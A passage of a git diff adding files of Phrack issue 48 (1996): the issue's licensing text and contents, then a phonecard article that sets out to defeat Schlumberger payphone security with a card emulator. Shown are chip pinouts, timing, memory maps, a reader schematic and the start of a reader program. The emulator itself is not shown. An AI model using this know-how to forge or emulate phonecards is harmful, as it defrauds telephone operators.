+existing in your possession (electronic or otherwise) until
+such a time as you have fulfilled your registration requirements.
+A form to request registration agreements is provided
+at the end of this file.  Cost is $100.00 US per user for
+subscription registration.  Cost of multi-user licenses will be
+negotiated on a site-by-site basis.
+
+Individual User:  If you are an individual end user whose use
+is not on behalf of a business, organization or government
+agency, you may read and possess copies of Phrack Magazine
+free of charge.  You may also distribute this magazine freely
+to any other such hobbyist or computer service provided for
+similar hobbyists.  If you are unsure of your qualifications
+as an individual user, please contact us as we do not wish to
+withhold Phrack from anyone whose occupations are not in conflict
+with our readership.
+
+_______________________________________________________________
+
+Phrack Magazine corporate/institutional/government agreement
+
+   Notice to users ("Company"):  READ THE FOLLOWING LEGAL
+AGREEMENT.  Company's use and/or possession of this Magazine is
+conditioned upon compliance by company with the terms of this
+agreement.  Any continued use or possession of this Magazine is
+conditioned upon payment by company of the negotiated fee
+specified in a letter of confirmation from Phrack Magazine.
+
+   This magazine may not be distributed by Company to any
+outside corporation, organization or government agency.  This
+agreement authorizes Company to use and possess the number of copies
+described in the confirmation letter from Phrack Magazine and for which
+Company has paid Phrack Magazine the negotiated agreement fee.  If
+the confirmation letter from Phrack Magazine indicates that Company's
+agreement is "Corporate-Wide", this agreement will be deemed to cover
+copies duplicated and distributed by Company for use by any additional
+employees of Company during the Term, at no additional charge.  This
+agreement will remain in effect for one year from the date of the
+confirmation letter from Phrack Magazine authorizing such continued use
+or such other period as is stated in the confirmation letter (the "Term").
+If Company does not obtain a confirmation letter and pay the applicable
+agreement fee, Company is in violation of applicable US Copyright laws.
+
+    This Magazine is protected by United States copyright laws and
+international treaty provisions.  Company acknowledges that no title to
+the intellectual property in the Magazine is transferred to Company.
+Company further acknowledges that full ownership rights to the Magazine
+will remain the exclusive property of Phrack Magazine and Company will
+not acquire any rights to the Magazine except as expressly set
+forth in this agreement.  Company agrees that any copies of the
+Magazine made by Company will contain the same proprietary
+notices which appear in this document.
+
+    In the event of invalidity of any provision of this agreement,
+the parties agree that such invalidity shall not affect the validity
+of the remaining portions of this agreement.
+
+    In no event shall Phrack Magazine be liable for consequential, incidental
+or indirect damages of any kind arising out of the delivery, performance or
+use of the information contained within the copy of this magazine, even
+if Phrack Magazine has been advised of the possibility of such damages.
+In no event will Phrack Magazine's liability for any claim, whether in
+contract, tort, or any other theory of liability, exceed the agreement fee
+paid by Company.
+
+    This Agreement will be governed by the laws of the State of Texas
+as they are applied to agreements to be entered into and to be performed
+entirely within Texas.  The United Nations Convention on Contracts for
+the International Sale of Goods is specifically disclaimed.
+
+    This Agreement together with any Phrack Magazine
+confirmation letter constitute the entire agreement between
+Company and Phrack Magazine which supersedes any prior agreement,
+including any prior agreement from Phrack Magazine, or understanding,
+whether written or oral, relating to the subject matter of this
+Agreement.  The terms and conditions of this Agreement shall
+apply to all orders submitted to Phrack Magazine and shall supersede any
+different or additional terms on purchase orders from Company.
+
+_________________________________________________________________
+
+            REGISTRATION INFORMATION REQUEST FORM
+
+
+We have approximately __________ users.
+
+Enclosed is  $________
+
+We desire Phrack Magazine distributed by (Choose one):
+
+Electronic Mail: _________
+Diskette:        _________  (Include size & computer format)
+
+
+Name:_______________________________  Dept:____________________
+
+Company:_______________________________________________________
+
+Address:_______________________________________________________
+
+_______________________________________________________________
+
+City/State/Province:___________________________________________
+
+Country/Postal Code:___________________________________________
+
+Telephone:____________________   Fax:__________________________
+
+
+Send to:
+
+Phrack Magazine
+603 W. 13th #1A-278
+Austin, TX 78701
+-----------------------------------------------------------------------------
+
+
+Enjoy the magazine.  It is for and by the hacking community.  Period.
+
+
+               Editors : Voyager, ReDragon, Daemon9
+               Mailboy : Erik Bloodaxe
+                 3L33t : Mudge  (See Below)
+                 Short : Security Dynamics (NSDQ:SDTI)  (See Above)
+          Myers-Briggs : ENTJ
+                  News : Datastream Cowboy
+    Prison Consultants : Co / Dec, Tcon
+Sick Sexy Horror Chick : Poppy Z. Brite
+             Thanks To : Cherokee, Damien Thorn, Boss Hogg, StaTiC,
+                         Sendai, Steve Fleming, The Guild
+                         Obi-1, Kwoody, Leper Messiah, Ace
+                         SevenUp, Logik Bomb, Wile Coyote
+     Special Thanks To : Everyone for being patient
+
+Phrack Magazine V. 7, #48, September 1, 1996.   ISSN 1068-1035
+Contents Copyright (C) 1996 Phrack Magazine, all rights reserved.
+Nothing may be reproduced in whole or in part without written
+permission.  Phrack Magazine is made available quarterly to the
+amateur computer hobbyist free of charge.  Any corporate, government,
+legal, or otherwise commercial usage or possession (electronic or
+otherwise) is strictly prohibited without prior registration, and
+is in violation of applicable US Copyright laws. To subscribe, send
+email to phrack@well.com and ask to be added to the list.
+
+                    Phrack Magazine
+                    603 W. 13th #1A-278              (Phrack Mailing Address)
+                    Austin, TX 78701
+
+                    ftp.fc.net                       (Phrack FTP Site)
+                    /pub/phrack
+
+                    http://www.fc.net/phrack         (Phrack WWW Home Page)
+
+                    phrack@well.com                  (Phrack E-mail Address)
+                 or phrackmag on America Online
+
+Submissions to the above email address may be encrypted
+with the following key : (Not that we use PGP or encourage its
+use or anything.  Heavens no.  That would be politically-incorrect.
+Maybe someone else is decrypting our mail for us on another machine
+that isn't used for Phrack publication.  Yeah, that's it.   :) )
+
+** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **
+
+Phrack goes out plaintext...you certainly can subscribe in plaintext.
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3a
+
+mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
+ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
+a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
+tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
+=q2KB
+
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+  -= Phrack 48 =-
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1. Introduction by the Editorial Staff                           13 K
+ 2. Phrack Loopback / Editorial                                   55 K
+ 3. Line Noise (Part I)                                           63 K
+ 4. Line Noise (Part II)                                          51 K
+ 5. Phrack Pro-Philes on the New Editors                          23 K
+ 6. Motorola Command Mode Information by Cherokee                 38 K
+ 7. Tandy / Radio Shack Cellular Phones by Damien Thorn           43 K
+ 8. The Craft Access Terminal by Boss Hogg                        36 K
+ 9. Information About NT's FMT-150/B/C/D by StaTiC                22 K
+10. Electronic Telephone Cards (Part I)                           39 K
+11. Electronic Telephone Cards (Part II)                          66 K
+12. Keytrap Revisited by Sendai                                   13 K
+13. Project Neptune by Daemon9                                    52 K
+14. IP-Spoofing Demystified by Daemon9                            25 K
+15. Netmon by Daemon9                                             21 K
+16. The Truth...and Nothing but the Truth by Steve Fleming        19 K
+17. International Scenes by Various Sources                       33 K
+18. Phrack World News by Datastream Cowboy                        21 K
+
+                                                    Total:       633 K
+
+_______________________________________________________________________________
+
+
+"The culture of criminal hackers seems to glorify behavior which would be
+classified as sociopathic or frankly psychotic."
+(Mich Kabay, director of education, NCSA, NCSA News, June 1996)
+
+"The Greek word 'diarrhein,' which means 'to flow through,' describes
+diarrhea very well."
+(Gross-ology by Sylvia Branzei, Planet Dexter, 1996)
+
+"Fuck you, clown!"
+(Thee Joker, Defcon IV, July 28, 1996)
diff --git a/phrack48/10.txt b/phrack48/10.txt
new file mode 100644
index 0000000..ddb1329
--- /dev/null
+++ b/phrack48/10.txt
@@ -0,0 +1,1040 @@
+                              ==Phrack Magazine==
+
+                 Volume Seven, Issue Forty-Eight, File 10 of 18
+
+
+              Electronic Telephone Cards: How to make your own!
+              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+I guess that Sweden is not the only country that employs the electronic
+phone card systems from Schlumberger Technologies. This article will
+explain a bit about the cards they use, and how they work. In the end of
+this article you will also find an UUEncoded file which contains source
+code for a PIC16C84 micro-controller program that completely emulates a
+Schlumberger Telephone card and of course printed circuit board layouts
++ a component list... But before we begin talking seriously of this
+matter I must first make it completely clear that whatever you use this
+information for, is entirely YOUR responsibility, and I cannot be held
+liable for any problems that the use of this information can cause for
+you or for anybody else. In other words: I give this away FOR FREE, and
+I don't expect to get ANYTHING back in return!
+
+The Original Telephone Card:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Since I probably would have had a hard time writing a better article
+than the one Stephane Bausson from France wrote a while ago, I will not
+attempt to give a better explanation than that one; I will instead
+incorporate it in this phile, but I do want to make it clear that the
+following part about the cards technical specification was not written
+by me: Merely the parts in quotes are things added by me... Instead I
+will concentrate on explaining how to build your own telephone card
+emulator and how the security measures in the payphone system created by
+Schlumberger Technologies work, and how to trick it... But first, let's
+have a look at the technical specifications of the various "smart memory
+card" systems used for the payphones.
+
+
+<Start of text quoted from Stephane Bausson (sbausson@ensem.u-nancy.fr)>
+------------------------------------------------------------------------------
+
+===============================================================================
+	      What you need to know about electronics telecards
+===============================================================================
+
+(C) 10-07-1993 / 03-1994
+Version 1.06
+Stephane BAUSSON
+
+Email: sbausson@ensem.u-nancy.fr
+Smail: 4, Rue de Grand; F-88630 CHERMISEY; France
+Phone: (33)-29-06-09-89
+-------------------------------------------------------------------------------
+    Any suggestions or comments about phonecards and smart-cards are welcome
+-------------------------------------------------------------------------------
+
+			      Content
+			     ---------
+
+I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur:
+
+    I-1) Introduction:
+    I-2) SCHEMATICS of the chip:
+    I-3) PINOUT of the connector:
+    I-4) Main features:
+    I-5) TIME DIAGRAMS:
+    I-6) Memory MAP of cards from France and Monaco:
+    I-5) Memory MAP of cards from other countries:
+
+II ) The cards from ODS: (German cards)
+
+    II-1) Introduction:
+    II-2) Pinout:
+    II-3) Main features:
+    II-4) Time Diagrams:
+    II-5) Memory Map:
+    II-6) Electrical features:
+
+
+III) The Reader Schematic:
+
+IV) The program:
+
+-------------------------------------------------------------------------------
+
+I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards)
+    ======================================================================
+
+    I-1) Introduction:
+	 ------------
+
+       You must not think that the electronics phone-cards are
+completely secret things, and that you can not read the information that
+is inside. It is quite false, since in fact an electronic phonecard does
+not contain any secret information like credit cards, and an electronic
+phonecard is nothing else than a 256 bit EPROM with serial output.
+
+       Besides do not think that you are going to refill them when you
+understand how they work, since for that you should reset the 256 bits
+of the cards by erasing the whole card. But the chip is coated in UV
+opaqued resin even if sometimes you can see it as transparent! Even if
+you were smart enough to erase the 256 bits of the card you should
+program the manufacturer area, but this is quite impossible since these
+first 96 bits are write protected by a lock-out fuse that is fused after
+the card programming in factory.
+
+       Nevertheless it can be very interesting to study how these cards
+work, to see which kind of data are inside and how the data are mapped
+inside or to see how many units are left inside for example. Besides
+there are a great number of applications of these cards when there are
+used (only for personal usage of course) , since you can use them as key
+to open a door, or you can also use them as key to secure a program,
+etc...
+
+       These Telecards have been created in 1984 and at this time
+constructors decided to build these cards in NMOS technology but now,
+they plan to change by 1994 all readers in the public to booths and use
+CMOS technology. Also they plan to use EEPROM to secure the cards and to
+add many useful informations in, and you will perhaps use phone cards to
+buy you bread or any thing else.
+
+These cards are called Second Generation Telecards.
+
+
+    I-2) SCHEMATICS of the chip:
+	 ----------------------
+
+		    .-------------------.
+		    |                   |
+		  --|> Clk              |
+		    | _                 |
+		  --| R/W               |
+		    |                   |
+		  --| Reset             |
+		    |                   |
+		  --| Fuse              |
+		    |                   |
+		  --| Vpp               |
+		    |                   |
+		    |                   |
+		    '-.               .-'
+		      |               |
+		    .-------------------.
+		    |               Out |-- serial output
+		    '-------------------'
+
+
+    I-3) PINOUT of the connector:
+	-------------------------
+
+
+	  AFNOR CHIP                                   ISO CHIP
+	  ----------                                   --------
+
+ -------------+-------------                 -------------+-------------
+|   8         |         4   |               |   1         |         5   |
+|             |             |               |             |             |
++-------\     |     /-------+               +-------\     |     /-------+
+|   7    +----+----+    3   |               |   2    +----+    +    6   |
+|        |         |        |               |        |         |        |
++--------|         |--------+               +--------|         |--------+
+|   6    |         |    2   |               |   3    |         |    7   |
+|        +    +----+        |               |        +----+----+        |
++-------/     |     \-------+               +-------/     |     \-------+
+|   5         |         1   |               |   4         |         8   |
+|             |             |               |             |             |
+ -------------+-------------                 -------------+-------------
+
+				     NB: only the position of the chip is ISO
+					 standardized and not the pinout
+
+PINOUT:    1 : Vcc = 5V        5 : Gnd
+------     2 : R/W             6 : Vpp = 21V
+	   3 : Clock           7 : I/O
+	   4 : Reset           8 : Fuse
+
+    I-4) Main features:
+	---------------
+
+	- Synchronous protocol.
+	- N-MOS technology.
+	- 256x1 bit organization.
+	- 96 written protected by a lock-out fuse.
+	- Low power 85mW in read mode.
+	- 21 V programming voltage.
+	- Access time: 500ns
+	- Operating range: -100C +700C
+	- Ten year data retention.
+
+
+    I-5) TIME DIAGRAMS:
+	---------------
+
++21V                                     _____________
++5V ____________________________________|             |_________________ Vpp
+					:             :
++5V                  ___________________:_____________:_________________ Reset
+0V  ________________|                   :             :
+		    :                   :             :
++5V     ____        :      ____         :       ______:______
+0V  ___|    |_______:_____|    |________:______|      :      |__________ Clock
+       :    :       :     :    :        :      :      :      :
++5V    :    :       :     :    :        :______:______:      :           _
+0V  ___:____:_______:_____:____:________|      :      |______:__________ R/W
+       :    :       :     :    :        :      :      :      :
++5V    :    :       :_____:    :________:      :      :      :__________
+0V  XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out
+       :    :       :     :    :        :<-----><---->:      :
+       :    :       :     :    :        :10 to   10 to       :
+       :    :       :     :    :        :50 ms   50ms        :
+	Reset        Bit 1        Bit2                           Bit 3
+	card        reading      reading  Bit2 writing to 1     reading
+
+
+
+    I-6) MEMORY MAP of cards from France and Monaco:
+	--------------------------------------------
+
+Bytes       Bits      Binary     Hexa
+
+		    +-----------+-----+
+  1        1 --> 8  |           |     | ---> Builder code.
+		    +-----------+-----+
+  2       9 --> 16  | 0000 0011 | $03 | ---> a French telecard
+		    +-----------+-----+
+  3      17 --> 24  |           |     |
+		    +-----------+-----+
+  4      25 --> 32  |           |     |
+		    +-----------+-----+
+  5      33 --> 40  |           |     |
+		    +-----------+-----+
+  6      41 --> 48  |           |     |
+		    +-----------+-----+
+  7      49 --> 56  |           |     |
+		    +-----------+-----+
+  8      57 --> 64  |           |     |
+		    +-----------+-----+
+  9      65 --> 72  |           |     |
+		    +-----------+-----+
+ 10      73 --> 80  |           |     |
+		    +-----------+-----+
+ 11      81 --> 88  |           |     |
+		    +-----------+-----+
+ 12      33 --> 40  | 0001 0011 | $13 | ---> 120 units card
+		    | 0000 0110 | $06 | --->  50 units card
+		    | 0000 0101 | $05 | --->  40 units card
+		    +-----------+-----+
+ 13-31  97 --> 248  |           |     | ---> The units area: each time a unit
+		    |           |     |      is used, then a bit is set to "1";
+                    |           |     |      Generally the first ten units are
+		    |           |     |      fused in factory as test.
+		    |           |     |
+		    |           |     |
+		    |           |     |
+		    +-----------+-----+
+ 32    249 --> 256  | 1111 1111 | $FF | ---> the card is empty
+		    +-----------+-----+
+
+
+
+    I-7) MEMORY MAP of the other cards:
+	-------------------------------
+
+Bytes       Bits      Binary     Hexa
+
+		    +-----------+-----+
+  1        1 --> 8  |           |     |
+		    +-----------+-----+
+  2       9 --> 16  | 1000 0011 | $83 | ---> a telecard
+		    +-----------+-----+-----------+-----+
+3-4      17 --> 32  | 1000 0000 | $80 | 0001 0010 | $12 | ---> 10 units card
+		    |           |     | 0010 0100 | $24 | ---> 22 units card
+		    |           |     | 0010 0111 | $27 | ---> 25 units card
+		    |           |     | 0011 0010 | $32 | ---> 30 units card
+		    |           |     | 0101 0010 | $52 | ---> 50 units card
+		    |           |     | 1000 0010 | $82 | ---> 80 units card
+		    | 1000 0001 | $81 | 0000 0010 | $02 | ---> 100 units card
+		    |           |     | 0101 0010 | $52 | ---> 150 units card
+		    +-----------+-----+-----------+-----+
+  5      33 --> 40  |           |     |
+		    +-----------+-----+
+  6      41 --> 48  |           |     |
+		    +-----------+-----+
+  7      49 --> 56  |           |     |
+		    +-----------+-----+
+  8      57 --> 64  |           |     |
+		    +-----------+-----+
+  9      65 --> 72  |           |     |
+		    +-----------+-----+
+ 10      73 --> 80  |           |     |
+		    +-----------+-----+
+ 11      81 --> 88  |           |     |
+		    +-----------+-----+
+ 12      89 --> 96  | 0001 1110 | $1E | ---> Sweden
+		    | 0010 0010 | $22 | ---> Spain
+		    | 0011 0000 | $30 | ---> Norway
+		    | 0011 0011 | $33 | ---> Andorra
+		    | 0011 1100 | $3C | ---> Ireland
+		    | 0100 0111 | $47 | ---> Portugal
+		    | 0101 0101 | $55 | ---> Czech Republic
+		    | 0101 1111 | $5F | ---> Gabon
+		    | 0110 0101 | $65 | ---> Finland
+		    +-----------+-----+
+ 13-31  97 --> 248  |           |     | ---> The units area: each time a unit
+		    |           |     |      is used, then a bit is set to "1";
+		    |           |     |
+		    |           |     |      Generally the first two units are
+		    |           |     |      fused in factory as test.
+		    |           |     |
+		    |           |     |
+		    +-----------+-----+
+ 32    249 --> 256  | 0000 0000 | $00 |
+		    +-----------+-----+
+
+
+
+II ) The cards from ODS, Giesecke & Devrient, ORGA Karten systeme,
+     =============================================================
+     Uniqua, Gemplus, Schlumberger and Oldenbourg Kartensysteme:
+     ===========================================================
+
+    II-1) Introduction:
+	  ------------
+
+        These cards are in fact 128 bit memory in NMOS technology, and
+the map of these cards are the following:
+
+	       64 bit EPROM written protected (manufacturer area).
+	       40 bit EEPROM (5x8 bits).
+	       24 bits set to "1".
+
+
+    II-2) Pinout:
+	 --------
+
+	   ISO 7816-2
+
+  -------------+-------------
+ |   1         |         5   |        Pinout:
+ |             |             |        -------
+ +-------\     |     /-------+
+ |   2    +----+    +    6   |          1 : Vcc = 5V    5 : Gnd
+ |        |         |        |          2 : Reset       6 : n.c.
+ +--------|         |--------+          3 : Clock       7 : I/O
+ |   3    |         |    7   |          4 : n.c.        8 : n.c.
+ |        +----+----+        |
+ +-------/     |     \-------+      n.c. : not connected
+ |   4         |         8   |
+ |             |             |
+  -------------+-------------
+
+
+    II-3) Main features:
+	 ---------------
+
+	- ISO 7816- 1/2 compatible.
+	- use a single 5V power supply.
+	- low power consumption.
+	- NMOS technology.
+
+    II-4) Time Diagrams:
+	----------------
+
+Reset:
+------
+  The address counter is reset to 0 when the clock line CLK is raised
+while the control line R is high. Note that the address counter can not
+be reset when it is in the range 0 to 7.
+
+      __________________
+_____|                  |_____________________________________________ Reset
+     :                  :
+     :        _____     :  _____       _____       _____       _____
+_____:_______|     |____:_|     |_____|     |_____|     |_____|     |_ Clk
+     :       :          : :     :     :     :     :     :     :     :
+_____:_______:__________:_:_____:_____:_____:_____:_____:_____:_____:_
+_____:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_:_ (Address)
+     :                  :       :           :           :           :
+_____:                  :_______:___________:___________:___________:_
+_____XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________|_ Data
+Bit n                      Bit 0    Bit 1        Bit2       Bit3
+
+   The address counter is incremented by 1 with each rising edge of the
+clock signal Clk, for as long as the control line R remains low. The
+data held in each addressed bit is output to I/O contact each time Clk
+falls. It is not impossible to decrement the address counter, therefore
+to address an earlier bit, the address counter must be reset then
+incremented to require value.
+
+
+Write:
+------
+   All unwritten or erased bits in the address 64-104 may be unwritten
+to. When a memory cell is unwritten to, it is set to 0. The addressed
+cell is unwritten to by the following sequence.
+
+1- R is raised while Clk is low, to disable address counter increment
+for one clock pulse.
+
+2- Clk is then raised for a minimum of 10ms to write to the address bit.
+
+When to write operation ends, and Clk falls, the address counter is
+unlocked, and the content of the written cell, which is now 0, is output
+to I/O contact if the operation is correct.
+
+The next Clk pulse will increment the address by one, then the write
+sequence can be repeated to write the next bit.
+
+	      _____                                _____
+____________|     |______________________________|     |_______________ Reset
+            :                                    :
+    ___     :           _____           ___      :           _____
+___|   |____:__________|     |_________|   |_____:__________|     |____ Clk
+   :        :          :     :         :   :     :          :     :
+___:________:__________:_____:_________:___:_____:__________:_____:_____
+n  |      n+1          |     n+2       |   :    n+3         |     :      (Addr)
+---'--------:----------'-----:---------'---:-----:----------'-----:-----
+            :          :     :             :     :          :     :
+________   _:          :     : ____________:  ___:          :     :
+________XXX_XXXXXXXXXXXXXXXXXXX____________ XX___XXXXXXXXXXXXXXXXXXXXXXX I/O
+  n      n+1           :     :     n+1        n+2           :     :
+                       :     :                              :     :
+                        write                                write
+
+
+WriteCarry:
+-----------
+
+   A counter is erased by performing the WRITECARRY sequence on the
+stage of the next highest weighing to that to be erased.
+
+The writecarry sequence is as follows:
+
+1 - Set the address counter to an unwritten bit in the next highest
+counter stage to that to be erased.
+
+2 - Increment is disabled on the following rising edge of R where Clk
+remains low.
+
+3 - Clk is then raised for a minimum of 10ms, while R is low, to write
+to the next address bit.
+
+4 - R is the raised again while Clk remains low to disable increment a
+second time.
+
+5 - Clk is the raised for a minimum of 1ms, while R is low, to write to
+the addressed bit a second time, erasing the counter level immediately
+below that the addressed bit.
+
+       _____                      _____
+______|     |____________________|     |_________________________________  Rst
+      :                          :
+      :            _______       :              _______        ___
+______:___________|       |______:_____________|       |______|   |______  Clk
+      :           :       :      :             :       :      :   :
+      :           :       :      :             :       :      :   :
+<------------------------- address n ------------------------>:<--- n+1 ------
+      :           :       :      :             :       :          :
+      :           :       :      :             :       :          :
+______:           :       :______:             :       :__________: _____
+______XXXXXXXXXXXXXXXXXXXXX______XXXXXXXXXXXXXXXXXXXXXXX__________XX_____  I/O
+		  :       :  n                 :       :     n        n+1
+		  :       :                    :       :
+		    Write                        Erase
+
+     II-5) Memory Map:
+	 -------------
+
+Bytes       Bits      Binary     Hexa
+
+		    +-----------+-----+
+  1       1 -->   8 |           |     |
+		    +-----------+-----+
+  2       9 -->  16 | 0010 1111 | $2F | ---> Germany
+		    | 0011 0111 | $37 | ---> Netherland
+		    | 0011 1011 | $3B | ---> Greece
+		    +-----------+-----+
+  3      17 -->  24 |           |     |
+  4      25 -->  32 |           |     | ---> Issuer area (written protected)
+  5      33 -->  40 |           |     |
+  6      41 -->  48 |           |     |
+  7      49 -->  56 |           |     |
+  8      57 -->  64 |           |     |
+		    +-----------+-----+
+  9      65 -->  72 |           |     | ---> c4096  )
+ 10      73 -->  80 |           |     | --->  c512  )
+ 11      81 -->  88 |           |     | --->   c64  ) 5 stage octal counter
+ 12      89 -->  96 |           |     | --->    c8  )
+ 13      97 --> 104 |           |     | --->    c0  )
+		    +-----------+-----+
+ 14     105 --> 112 | 1111 1111 | $FF |
+ 15     113 --> 120 | 1111 1111 | $FF | ---> area of bits set to "1"
+ 16     120 --> 128 | 1111 1111 | $FF |
+		    +-----------+-----+
+
+The Issuer area:
+----------------
+
+    This issuer consists of 40 bits. The contents of the issuer area are
+specified by the card issuer, and are fixed during the manufacturing
+process. The contents of the issuer area will include data such as
+serial numbers, dates, and distribution centers.
+
+This area may only be read.
+
+The Counter area:
+-----------------
+
+   The counter area stores the card's units. Its initial value is
+specified by the card issuer and set during manufacturing.
+
+The counter area is divided into a 5 stage abacus.
+
+Note that you can only decrease the counter and it is not authorized to
+write in the counter a value greater than the old value.
+
+
+    I-6) Electrical features:
+	--------------------
+
+Maximum ratings:
+----------------
+
+		       +--------+------+------+------+
+		       | Symbol | Min  |  Max | Unit |
++----------------------+--------+------+------+------+
+| Supply voltage       |   Vcc  | -0.3 |    6 |   V  |
++----------------------+--------+------+------+------+
+| Input voltage        |   Vss  | -0.3 |    6 |   V  |
++----------------------+--------+------+------+------+
+| Storage temperature  |  Tstg  |  -20 |  +55 |  0C  |
++----------------------+--------+------+------+------+
+| Power dissipation   |    Pd  |   -  |   50 |  mW  |
++----------------------+--------+------+------+------+
+
+
+DC characteristics:
+------------------
+			    +--------+-----+-----+-----+------+
+			    | Symbol | Min.| Typ.| Max.| Unit |
++---------------------------+--------+-----+-----+-----+------+
+| Supply current            |   Icc  |  -  |  -  |   5 |   mA |
++---------------------------+--------+-----+-----+-----+------+
+| Input Voltage (low)       |    Vl  |   0 |  -  | 0.8 |    V |
++---------------------------+--------+-----+-----+-----+------+
+| Input voltage (high)      |    Vh  | 3.5 |  -  | Vcc |    V |
++---------------------------+--------+-----+-----+-----+------+
+| Input current R           |    Ih  |  -  |  -  | 100 |   uA |
++---------------------------+--------+-----+-----+-----+------+
+| Input current Clk         |    Il  |  -  |  -  | 100 |   uA |
++---------------------------+--------+-----+-----+-----+------+
+| Output current (Vol=0.5V) |   Iol  |  -  |  -  |  10 |   uA |
++---------------------------+--------+-----+-----+-----+------+
+| Output current (Voh=5V)   |   Ioh  |  -  |  -  | 0.5 |   mA |
++---------------------------+--------+-----+-----+-----+------+
+
+AC characteristics:
+------------------     +--------+------+------+------+
+		       | Symbol | Min. | Max. | Unit |
++----------------------+--------+------+------+------+
+| Pulse duration       |    tr  |   50 |   -  |  us  |
+| R address reset      |        |      |      |      |
++----------------------+--------+------+------+------+
+| Pulse duration       |    ts  |   10 |   -  |  us  |
+| R write              |        |      |      |      |
++----------------------+--------+------+------+------+
+| High level Clk       |    th  |    8 |   -  |  us  |
++----------------------+--------+------+------+------+
+| Low level Clk        |    tl  |   12 |   -  |  us  |
++----------------------+--------+------+------+------+
+| Write window         | Twrite |   10 |   -  |  ms  |
++----------------------+--------+------+------+------+
+| Erase window         | Terase |   10 |   -  |  ms  |
++----------------------+--------+------+------+------+
+|                      |   tv1  |    5 |   -  |  us  |
++----------------------+--------+------+------+------+
+|                      |   tv2  |  3.5 |   -  |  us  |
++----------------------+--------+------+------+------+
+|                      |   tv3  |  3.5 |   -  |  us  |
++----------------------+--------+------+------+------+
+|                      |   tv4  |  3.5 |   -  |  us  |
++----------------------+--------+------+------+------+
+|                      |   tv5  |  3.5 |   -  |  us  |
++----------------------+--------+------+------+------+
+|                      |   tv6  |    5 |   -  |  us  |
++----------------------+--------+------+------+------+
+|                      |   tv7  |    5 |   -  |  us  |
++----------------------+--------+------+------+------+
+|                      |   tv8  |   10 |   -  |  us  |
++----------------------+--------+------+------+------+
+
+
+
+III) The Reader Schematic:
+    ======================
+
+   External 5V (Optional)
+
+5V o------,
+	  |                 /             T2  PNP      d13  r7 10
+0V o--,   |                /               BC 177     |\ |  _____
+      |   |      ,-------o/   o--*------. E      C .--| >+-[_____]--------,
+    __+__ |      |               |       \        /   |/ |                |
+    \\\\\ |    __|__ Battery     |         \    /                         |
+	  |      -   22.5V       |       ---------                        |
+.......   |      |               |   _____   |   _____                    |
+       :  |    __+__             +--[_____]--*--[_____]--,                |
+   D2  :  |    \\\\\                r6 150k     r5 15k   |                |
+4 o-------|---------------------------*------------------|-------------,  |
+       :  |                           |   r3 220k       / C            |  |
+   Ack :  |                           |   _____      |/    T1 - NPN    |  |
+10 o------|--------.                  '--[_____]-*---|      BC107      |  |
+       :  |        |                      _____  |   |\                |  |
+       : ,-,      ,-,                 +--[_____]-'      \ E            |  |
+       : | |r2    | |r1               |  r4 390k         |             |  |
+       : | |220   | |22k            __+__              __+__           |  |
+       : |_|      |_|               \\\\\              \\\\\           |  |
+       :  |  |\ |  |                                                   |  |
+       :  *--| >+--|----------------*----------------------------------|--*
+       :  |  |/ |  |          ,-----|-----------------------------,    |  |
+       :  |  d1    |          |     |   ,----------,----------,   |    |  |
+       :  |        |          |     *---|--*  Fuse | Reset *--|---'    |  |
+       :  |        |          |     |   |----------|----------|        |  |
+   D0  :  |        |          |   ,-|---|--*   I/O | Clk   *--|---,    |  |
+2 o-------|--------|----------'   | |   |----------|----------|   |    |  |
+       :  |        |              | '---|--*   Vpp | R/W   *--|---|----'  |
+  Busy :  |        |              |     |----------|----------|   |       |
+11 o------|--------|--------------' ,---|--*   Gnd | 5V    *  |   |       |
+       :  |        |                |   '----------'-------|--'   |       |
+   D1  :  |        |              __+__    Chip connector  |      |       |
+3 o-------|--------|--------,     \\\\\                    |      |       |
+       :  |        |        '------------------------------|------'       |
+  Str  :  |  |\ |  |                                       |              |
+1 o-------*--| >+--*----*----*----*----*-------------------'              |
+       :   d2|/ |  |d3  |d4  |d5  |d6  |d7                                |
+       :          -+-  -+-  -+-  -+-  -+-                                 |
+       :          /_\  /_\  /_\  /_\  /_\                                 |
+   D3  :           |    |    |    |    |   |\ | d8                        |
+5 o----------------*----|----|----|----|---| >+-------*-------------------'
+       :                |    |    |    |   |/ |       |
+       :                |    |    |    |              |
+   D4  :                |    |    |    |   |\ | d9    |
+6 o---------------------*----|----|----|---| >+-------*
+       :                     |    |    |   |/ |       |
+       :                     |    |    |              |
+   D5  :                     |    |    |   |\ | d10   |
+7 o--------------------------*----|----|---| >+-------*
+       :                          |    |   |/ |       |
+       :                          |    |              |
+   D6  :                          |    |   |\ | d11   |
+8 o-------------------------------*----|---| >+-------*
+       :                               |   |/ |       |
+       :                               |              |
+   D7  :                               |   |\ | d12   |
+9 o------------------------------------*---| >+-------'
+       :                                   |/ |
+       :
+       :
+25 o------.
+       :  |
+.......:  |                                 d1 to d13: 1N4148
+	__+__
+	\\\\\
+
+Centronics port
+
+
+
+
+IV) The program:
+    ===========
+
+    The following program will enable you to read telecards on you PC if you
+build the reader.
+
+--------------- cut here (begin)
+{*****************************************************************************}
+{                             T E L E C A R D . PAS                           }
+{*****************************************************************************}
+{   This program enable you to dumb the memory of electronics phonecards      }
+{   from all over the world, so that you will be able to see which country    }
+{   the card is from how many units are left and so on ....                   }
+{*****************************************************************************}
+{                                                                             }
+{                        Written by Stephane BAUSSON (1993)                   }
+{                                                                             }
+{                         Email: sbausson@ensem.u-nancy.fr                    }
+{                                                                             }
